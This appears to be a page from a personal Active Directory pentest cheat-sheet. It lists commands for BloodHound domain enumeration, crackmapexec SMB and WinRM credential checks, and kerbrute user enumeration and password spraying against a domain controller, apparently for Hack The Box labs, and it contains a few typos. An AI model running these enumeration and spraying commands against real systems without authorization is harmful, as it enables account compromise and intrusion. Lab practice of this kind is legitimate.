Enumeration


>>>bloodhound-pyhton  -u  username  -p  password  -d  htb.local  -ns  $IP

Grabbing Host-name

crackmapexec smb $IP

You found Users but want to confirm 👍

Page Link : https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
./kerbrute _linux_amd64 userenum --dc $IP -d <domain> users.txt

you have a password but don't know of which user 👍

./kerbrute _linux_amd64 passwordspray 	--dc $IP -d <domain>  users.txt  ‘Iampassword?’

test If your founded User can be accessed

crackmapexec smb $IP -u  username -p ‘password’

crackmapexec winrm $IP -u  username -p ‘password’

crackmapexec winrm $IP -d domain -u  username -p ‘password’

Bloodhound

Link : https://github.com/fox-it/BloodHound.py
python3 bloodhound.py -u username -p ‘password’ -d  <domain> -ns  $IP  -c All
above command will generate some json files for bloodhound.

sudo neo4j console 

wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.1.0/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip
cd BloodHound-linux-x64.zip
chmod +x BloodHound
./BloodHound

PreviousActive Directory Nextmy A.D. Cheat-Sheet

Last updated 3 years ago